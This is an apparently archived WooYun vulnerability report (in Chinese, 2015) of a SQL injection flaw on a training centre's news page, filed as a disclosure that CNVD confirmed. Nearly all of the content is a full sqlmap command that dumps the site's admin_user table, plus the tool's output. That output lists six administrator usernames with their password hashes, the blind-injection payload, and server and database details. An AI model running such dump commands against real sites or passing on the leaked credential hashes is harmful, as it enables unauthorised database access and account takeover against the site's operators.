乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-16: 细节已通知厂商并且等待厂商处理中 2015-12-18: 厂商已经确认,细节仅向厂商公开 2015-12-28: 细节向核心白帽子及相关领域专家公开 2016-01-07: 细节向普通白帽子公开 2016-01-17: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
某管理培训中心主站存在sql注入漏洞
地址:http://**.**.**.**/bh_news.display.php?id=620
$ python sqlmap.py -u "http://**.**.**.**/bh_news.display.php?id=620" -p id --technique=B --output-dir=output --random-agent --batch --no-cast -D pkufdc -T admin_user -C uname,upwd,flag,uid --dump
Database: pkufdcTable: admin_user[6 entries]+------------+----------------------------------+------+-----+| uname | upwd | flag | uid |+------------+----------------------------------+------+-----+| admin | bf6343d07da915750209d813f4c1766f | 1 | 2 || zhaoxiaofa | e5ed2706eb1d704211240756e1eee728 | 1 | 3 || liulaoshi | 04cfa571f81d3c1a2b12f49cc2332d64 | 1 | 4 || admin8 | ac9fd5dfa53d60d9346d7eb08c92993e | 1 | 5 || dom | e5ed2706eb1d704211240756e1eee728 | 1 | 6 || ADMIN | f6010169462a2b856ce8593eb027b134 | 1 | 7 |+------------+----------------------------------+------+-----+<
---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=620 AND 4802=4802---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0current user: 'pkufdc@%'current user is DBA: Falsedatabase management system users [1]:[*] 'pkufdc'@'%'Database: pkufdc+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| n_article | 556 || n_class | 158 || n_tag | 108 || zxbmb | 18 || admin_user | 6 || webconfig | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 399 || GLOBAL_STATUS | 291 || SESSION_STATUS | 291 || GLOBAL_VARIABLES | 277 || SESSION_VARIABLES | 277 || COLLATION_CHARACTER_SET_APPLICABILITY | 128 || COLLATIONS | 127 || CHARACTER_SETS | 36 || PARTITIONS | 36 || TABLES | 36 || SCHEMA_PRIVILEGES | 18 || PLUGINS | 10 || ENGINES | 8 || KEY_COLUMN_USAGE | 8 || STATISTICS | 8 || TABLE_CONSTRAINTS | 8 || SCHEMATA | 2 || PROCESSLIST | 1 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=620 AND 4802=4802---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5Database: pkufdcTable: admin_user[4 columns]+--------+--------------+| Column | Type |+--------+--------------+| flag | tinyint(4) || uid | int(11) || uname | varchar(20) || upwd | varchar(100) |+--------+--------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=620 AND 4802=4802---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5Database: pkufdcTable: admin_user[6 entries]+------------+----------------------------------+------+-----+| uname | upwd | flag | uid |+------------+----------------------------------+------+-----+| admin | bf6343d07da915750209d813f4c1766f | 1 | 2 || zhaoxiaofa | e5ed2706eb1d704211240756e1eee728 | 1 | 3 || liulaoshi | 04cfa571f81d3c1a2b12f49cc2332d64 | 1 | 4 || admin8 | ac9fd5dfa53d60d9346d7eb08c92993e | 1 | 5 || dom | e5ed2706eb1d704211240756e1eee728 | 1 | 6 || ADMIN | f6010169462a2b856ce8593eb027b134 | 1 | 7 |+------------+----------------------------------+------+-----+
上WAF。
危害等级:高
漏洞Rank:10
确认时间:2015-12-18 11:53
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给北京分中心,由北京分中心后续协调网站管理单位处置。
暂无